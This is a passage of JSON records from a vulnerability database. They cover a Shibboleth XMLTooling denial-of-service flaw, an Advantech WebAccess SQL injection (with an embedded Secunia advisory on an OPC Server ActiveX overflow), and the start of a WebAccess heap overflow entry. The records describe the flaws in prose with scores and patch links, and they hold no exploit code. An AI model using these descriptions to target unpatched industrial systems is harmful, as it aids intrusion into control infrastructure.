"patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "cpp-xmltooling.git / commitdiff", "trust": 0.8, "url": "https://git.shibboleth.net/view/?p=cpp-xmltooling.git;a=commitdiff;h=2d795c731e6729309044607154978696a87fd900" }, { "title": "[21 July 2015]", "trust": 0.8, "url": "http://shibboleth.net/community/advisories/secadv_20150721.txt" }, { "title": "Advantech WebAccess denial of service vulnerability patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/70373" }, { "title": "cpp-xmltooling.git-2d795c731e6729309044607154978696a87fd900", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=57194" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-00428" }, { "db": "JVNDB", "id": "JVNDB-2015-004047" }, { "db": "CNNVD", "id": "CNNVD-201508-095" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-189", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-004047" }, { "db": "NVD", "id": "CVE-2015-0851" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.6, "url": "http://shibboleth.net/community/advisories/secadv_20150721.txt" }, { "trust": 1.6, "url": "http://www.debian.org/security/2015/dsa-3321" }, { "trust": 1.4, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-0851" }, { "trust": 1.0, "url": "http://www.securityfocus.com/bid/76134" }, { "trust": 1.0, "url": "https://git.shibboleth.net/view/?p=cpp-xmltooling.git%3ba=commitdiff%3bh=2d795c731e6729309044607154978696a87fd900" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0851" }, { "trust": 0.6, "url": "https://git.shibboleth.net/view/?p=cpp-xmltooling.git;a=commitdiff;h=2d795c731e6729309044607154978696a87fd900" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0851" }, { "trust": 0.1, "url": "https://www.debian.org/security/" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-00428" }, { "db": "JVNDB", "id": "JVNDB-2015-004047" }, { "db": "PACKETSTORM", "id": "132904" }, { "db": "CNNVD", "id": "CNNVD-201508-095" }, { "db": "NVD", "id": "CVE-2015-0851" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2016-00428" }, { "db": "BID", "id": "76134" }, { "db": "JVNDB", "id": "JVNDB-2015-004047" }, { "db": "PACKETSTORM", "id": "132904" }, { "db": "CNNVD", "id": "CNNVD-201508-095" }, { "db": "NVD", "id": "CVE-2015-0851" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-25T00:00:00", "db": "CNVD", "id": "CNVD-2016-00428" }, { "date": "2015-07-21T00:00:00", "db": "BID", "id": "76134" }, { "date": "2015-08-13T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-004047" }, { "date": "2015-08-03T01:17:30", "db": "PACKETSTORM", "id": "132904" }, { "date": "2015-08-13T00:00:00", "db": "CNNVD", "id": "CNNVD-201508-095" }, { "date": "2015-08-12T14:59:01.793000", "db": "NVD", "id": "CVE-2015-0851" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-25T00:00:00", "db": "CNVD", "id": "CNVD-2016-00428" }, { "date": "2015-08-12T22:42:00", "db": "BID", "id": "76134" }, { "date": "2015-08-13T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-004047" }, { "date": "2015-08-13T00:00:00", "db": "CNNVD", "id": "CNNVD-201508-095" }, { "date": "2024-11-21T02:23:51.180000", "db": "NVD", "id": "CVE-2015-0851" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "132904" }, { "db": "CNNVD", "id": "CNNVD-201508-095" } ], "trust": 0.7 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSAML-C and Shibboleth Service Provider Used in XMLTooling-C Service disruption in (DoS) Vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-004047" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "digital error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201508-095" } ], "trust": 0.6 } }
var-201202-0214
Vulnerability from variot
SQL injection vulnerability in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to execute arbitrary SQL commands via a malformed URL. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess is prone to multiple remote vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach? Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM: http://secunia.com/products/corporate/vim/ovum_2011_request/
TITLE: Advantech OPC Server ADAM ActiveX Control Buffer Overflow Vulnerability
SECUNIA ADVISORY ID: SA46775
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46775/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
RELEASE DATE: 2011-11-07
DISCUSS ADVISORY: http://secunia.com/advisories/46775/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/46775/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A vulnerability has been reported in Advantech OPC Server, which can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to an error in the ADAM ActiveX control and can be exploited to cause a buffer overflow.
Successful exploitation may allow execution of arbitrary code.
The vulnerability is reported in the following components: * Advantech ADAM OPC Server versions prior to V3.01.012. * Advantech Modbus RTU OPC Server versions prior to V3.01.010. * Advantech Modbus TCP OPC Server versions prior to V3.01.010.
SOLUTION: Reportedly a patch has been released. Contact the vendor for further information.
PROVIDED AND/OR DISCOVERED BY: ICS-CERT credits Security Research and Service Institute Information and Communication Security Technology Center (ICST).
ORIGINAL ADVISORY: ICS-CERT: http://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201202-0214", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "6.0" }, { "model": "broadwin webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "broadwin", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "6.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "5.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "1a605f08-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0663" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001552" }, { "db": "CNNVD", "id": "CNNVD-201202-410" }, { "db": "NVD", "id": "CVE-2012-0234" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:broadwin:webaccess", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001552" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Sense Vulnerability Coordination Team, Greg MacManus of iSIGHT Partners, Kuang-Chun Hung of Security Research and Service Institute-Information and Communication Security Technology Center (ICST), Luigi Auriemma, and\nSnake (alias).", "sources": [ { "db": "BID", "id": "52051" } ], "trust": 0.3 }, "cve": "CVE-2012-0234", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2012-0234", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "1a605f08-2354-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-53515", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2012-0234", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2012-0234", "trust": 0.8, "value": "High" }, { "author": "CNNVD", "id": "CNNVD-201202-410", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "1a605f08-2354-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-53515", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "1a605f08-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-53515" }, { "db": "JVNDB", "id": "JVNDB-2012-001552" }, { "db": "CNNVD", "id": "CNNVD-201202-410" }, { "db": "NVD", "id": "CVE-2012-0234" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "SQL injection vulnerability in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to execute arbitrary SQL commands via a malformed URL. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess is prone to multiple remote vulnerabilities. \nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------\n\nOvum says ad hoc tools are out-dated. The best practice approach?\nFast vulnerability intelligence, threat handling, and setup in one tool. \n\nRead the new report on the Secunia VIM:\nhttp://secunia.com/products/corporate/vim/ovum_2011_request/ \n\n----------------------------------------------------------------------\n\nTITLE:\nAdvantech OPC Server ADAM ActiveX Control Buffer Overflow\nVulnerability\n\nSECUNIA ADVISORY ID:\nSA46775\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/46775/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nRELEASE DATE:\n2011-11-07\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/46775/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/46775/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in Advantech OPC Server, which can\nbe exploited by malicious people to compromise a user\u0027s system. \n\nThe vulnerability is caused due to an error in the ADAM ActiveX\ncontrol and can be exploited to cause a buffer overflow. \n\nSuccessful exploitation may allow execution of arbitrary code. \n\nThe vulnerability is reported in the following components:\n* Advantech ADAM OPC Server versions prior to V3.01.012. \n* Advantech Modbus RTU OPC Server versions prior to V3.01.010. \n* Advantech Modbus TCP OPC Server versions prior to V3.01.010. \n\nSOLUTION:\nReportedly a patch has been released. Contact the vendor for further\ninformation. \n\nPROVIDED AND/OR DISCOVERED BY:\nICS-CERT credits Security Research and Service Institute Information\nand Communication Security Technology Center (ICST). \n\nORIGINAL ADVISORY:\nICS-CERT:\nhttp://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n", "sources": [ { "db": "NVD", "id": "CVE-2012-0234" }, { "db": "JVNDB", "id": "JVNDB-2012-001552" }, { "db": "CNVD", "id": "CNVD-2012-0663" }, { "db": "BID", "id": "52051" }, { "db": "IVD", "id": "1a605f08-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-53515" }, { "db": "PACKETSTORM", "id": "106765" } ], "trust": 2.79 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2012-0234", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-12-047-01", "trust": 2.3 }, { "db": "BID", "id": "52051", "trust": 1.4 }, { "db": "CNNVD", "id": "CNNVD-201202-410", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2012-0663", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-12-047-01A", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2012-001552", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-11-279-01", "trust": 0.4 }, { "db": "IVD", "id": "1A605F08-2354-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "SECUNIA", "id": "46775", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-53515", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "106765", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "1a605f08-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0663" }, { "db": "VULHUB", "id": "VHN-53515" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001552" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-410" }, { "db": "NVD", "id": "CVE-2012-0234" } ] }, "id": "VAR-201202-0214", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "1a605f08-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0663" }, { "db": "VULHUB", "id": "VHN-53515" } ], "trust": 1.551177005 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "1a605f08-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0663" } ] }, "last_update_date": "2024-11-23T21:46:31.798000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/Webaccess-HMI-SCADA-Software/sub_GF-1M94V.aspx" }, { "title": "WebAccess", "trust": 0.8, "url": "http://www.broadwin.com/features.htm" }, { "title": "Offices Distributors", "trust": 0.8, "url": "http://www.broadwin.com/Offices.htm" }, { "title": "\u30d1\u30fc\u30c8\u30ca\u30fc\u60c5\u5831", "trust": 0.8, "url": "http://www.advantech.co.jp/support-AJP/distributors.asp" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.advantech.co.jp/" }, { "title": "Patch for Advantech WebAccess SQL Injection Vulnerability (CNVD-2012-0663)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/10192" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0663" }, { "db": "JVNDB", "id": "JVNDB-2012-001552" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-89", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-53515" }, { "db": "JVNDB", "id": "JVNDB-2012-001552" }, { "db": "NVD", "id": "CVE-2012-0234" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.3, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01.pdf" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/52051" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-0234" }, { "trust": 0.8, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01a.pdf" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-0234" }, { "trust": 0.4, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-11-279-01.pdf" }, { "trust": 0.3, "url": "http://webaccess.advantech.com/product.php" }, { "trust": 0.1, "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_intelligence/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/secunia_security_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/about_secunia_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/personal/" }, { "trust": 0.1, "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org" }, { "trust": 0.1, "url": "http://secunia.com/products/corporate/vim/ovum_2011_request/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/#comments" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0663" }, { "db": "VULHUB", "id": "VHN-53515" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001552" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-410" }, { "db": "NVD", "id": "CVE-2012-0234" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "1a605f08-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0663" }, { "db": "VULHUB", "id": "VHN-53515" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001552" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-410" }, { "db": "NVD", "id": "CVE-2012-0234" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "IVD", "id": "1a605f08-2354-11e6-abef-000c29c66e3d" }, { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0663" }, { "date": "2012-02-21T00:00:00", "db": "VULHUB", "id": "VHN-53515" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001552" }, { "date": "2011-11-09T12:04:37", "db": "PACKETSTORM", "id": "106765" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-410" }, { "date": "2012-02-21T13:31:56.970000", "db": "NVD", "id": "CVE-2012-0234" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0663" }, { "date": "2018-01-05T00:00:00", "db": "VULHUB", "id": "VHN-53515" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001552" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-410" }, { "date": "2024-11-21T01:34:38.057000", "db": "NVD", "id": "CVE-2012-0234" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201202-410" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech/BroadWin WebAccess In SQL Injection vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001552" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "SQL injection", "sources": [ { "db": "IVD", "id": "1a605f08-2354-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201202-410" } ], "trust": 0.8 } }
var-201602-0490
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C80 IOCTL in the BwOpcTool subsystem. A heap-based buffer overflow vulnerability exists in a call to strcpy using a string in a NamedObject structure within the input. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.
